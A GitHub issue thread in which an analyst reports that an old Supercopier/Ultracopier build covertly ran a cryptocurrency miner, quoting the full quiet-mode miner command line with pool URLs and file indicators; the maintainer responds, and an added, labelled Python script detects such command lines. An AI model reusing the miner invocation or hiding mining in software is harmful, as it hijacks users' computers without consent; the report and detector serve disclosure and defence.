
ULTRACOPIER IS USED TO MINE CRYPTOCURRENCY WITHOUT THE USER'S KNOWLEDGE #23

Closed
iaji opened this issue Nov 14, 2017 · 7 comments

Comments

@iaji

@iaji iaji commented Nov 14, 2017

"C:\Program Files\Supercopier\miner\miner.exe" --scrypt -o stratum+tcp://usa.wemineltc.com:3335 -u alphaonex86.pool10 -p [RANDOM-STRING] -o stratum+tcp://freedom.wemineltc.com:3334 -u alphaonex86.pool10 -p [RANDOM-STRING] -o stratum+tcp://hk2.wemineltc.com:80 -u alphaonex86.pool10 -p [RANDOM-STRING] -o stratum+tcp://usa.wemineltc.com:80 -u alphaonex86.pool10 -p [RANDOM-STRING] --no-adl --real-quiet -T -S opencl:auto

As you can see from the command line above Supercopier/Ultracopier launches a number of miner.exe processes which then connect out to a few domains associated with mining. At least hide your username from the command if you're going to try to pull something like this off...

Process Supercopier.exe made a DNS request to ultracopier.first-world[.]info and changed a registry value to ultracopier which makes me think this is the work of your Ultracopier despite the references to Supercopier in the command line.

Virustotal for Supercopier.exe: https://www.virustotal.com/en/file/b15fe48276d5280f2500aaa2aeabea0861f2317b1fc1843d08dfa9357aa92c3b/analysis/

VirusTotal for miner.exe: https://www.virustotal.com/en/file/b203ed791b259f2495b77e9f1c74f9ee40f4323fc904be5f31da695c86153036/analysis/

Here are some disk operations performed by this software for its miner:
\Device\HarddiskVolume2\Program Files\Supercopier\miner\libevent-2-0-5.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\libhidapi-0.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\libblkmaker-0.1-0.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\libblkmaker_jansson-0.1-0.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\libcurl-4.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\libusb-1.0.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\libjansson-4.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\pdcurses.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\pthreadGC2.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\zlib1.dll
\Device\HarddiskVolume2\Program Files\Supercopier\miner\miner.exe

You should probably not do this...
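As an added defender-side example (not part of the original report or of the Ultracopier project), this Python triage routine flags process command lines carrying the indicators iaji reports above: stratum+tcp:// pool URLs, the -u worker name and the miner switches. The sample command lines are constructed; the first mirrors the reported one with the pool passwords replaced, the renamed-binary path in the last is hypothetical.

```python
import re
import shlex

# Stratum pool URLs, the scheme seen in the reported command line.
STRATUM_RE = re.compile(r"stratum\+tcp://([A-Za-z0-9.-]+)(?::(\d+))?")
# Switches typical of cgminer/bfgminer-style miners, taken from the report above.
MINER_FLAGS = {"--scrypt", "--real-quiet", "--no-adl", "-S"}


def analyze_cmdline(cmdline):
    """Describe the mining indicators found in one process command line."""
    try:
        # posix=False keeps Windows backslashes and quoted paths intact.
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        argv = cmdline.split()
    pools = [(host, int(port) if port else None)
             for host, port in STRATUM_RE.findall(cmdline)]
    # Worker names follow "-u"; "-p" values are deliberately not collected.
    workers = sorted({argv[i + 1] for i, a in enumerate(argv)
                      if a == "-u" and i + 1 < len(argv)})
    flags = sorted(f for f in MINER_FLAGS if f in argv)
    image = argv[0].strip('"') if argv else ""
    # A stratum URL alone is decisive; otherwise require several weaker hints.
    hints = len(flags) + (1 if image.lower().endswith("miner.exe") else 0)
    return {"image": image, "pools": pools, "workers": workers,
            "flags": flags, "suspicious": bool(pools) or hints >= 3}


def scan(cmdlines):
    """Return the analysis of every command line that looks like a miner."""
    return [r for r in map(analyze_cmdline, cmdlines) if r["suspicious"]]


# Constructed samples: the first mirrors the report (passwords replaced by x),
# the second is benign, the third is a hypothetical renamed miner binary.
SAMPLE_CMDLINES = [
    '"C:\\Program Files\\Supercopier\\miner\\miner.exe" --scrypt '
    '-o stratum+tcp://usa.wemineltc.com:3335 -u alphaonex86.pool10 -p x '
    '-o stratum+tcp://hk2.wemineltc.com:80 -u alphaonex86.pool10 -p x '
    '--no-adl --real-quiet -T -S opencl:auto',
    'cmd.exe /c xcopy C:\\data D:\\backup /E',
    'C:\\Users\\Public\\svc.exe -o stratum+tcp://freedom.wemineltc.com:3334 -u w -p x',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(hit["image"], hit["pools"], hit["workers"])
```

The third sample shows why the pool URL, not the binary name, should drive the alert: a renamed miner is still caught by its stratum connection string.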

@alphaonex86

Owner

@alphaonex86 alphaonex86 commented Nov 14, 2017

Hi, where did you find this old version? The new version doesn't do this.

wemineltc.com is closed now.
Supercopier was merged with Ultracopier; they use the same code base and updater, which is why it connects to the Ultracopier website.

@iaji

Author

@iaji iaji commented Nov 14, 2017

It's not very ethical to have any software marketed as a file transfer program mine crypto in the background.

This program triggered an alert on some computers and I took a look at them, that's as much as I can say about this.

@alphaonex86

Owner

@alphaonex86 alphaonex86 commented Nov 14, 2017

  1. We chose this in 2013, for 6 months, with the community, to make the project more professional; thanks to this I was able to release version 1.0.
  2. This was dropped years ago; we are in 2017.
  3. It has a big warning that this software contains a miner AND proposes a version without the miner; the miner version is only for people who wish to support the project and get the ultimate version for free (it's to fight against cracks and other illegal versions with backdoors and trojans).

Please, again: where did you find this very old version?

@iaji

Author

@iaji iaji commented Nov 14, 2017

I wish I could let you know more but I am only the analyst and messenger. I did not install your software on the computers I looked at. I also do not know how the users installed your software (whether it was legit or cracked).

I thought I would inform you and the users about my findings, thanks for being so responsive in clearing this up.

@alphaonex86

Owner

@alphaonex86 alphaonex86 commented Nov 14, 2017

Thanks. If you can find this out, I will do my best to remove this old version from the internet.

Update so you don't have this.

@darkdragon-001

Contributor

@darkdragon-001 darkdragon-001 commented Dec 5, 2017

Anyway, I would still suggest removing the miner functionality from the source completely...

@alphaonex86

Owner

@alphaonex86 alphaonex86 commented Dec 5, 2017

It's totally disabled via a macro. And this suggests I have something to hide.
But to have cleaner code you are right. Today I will do that.
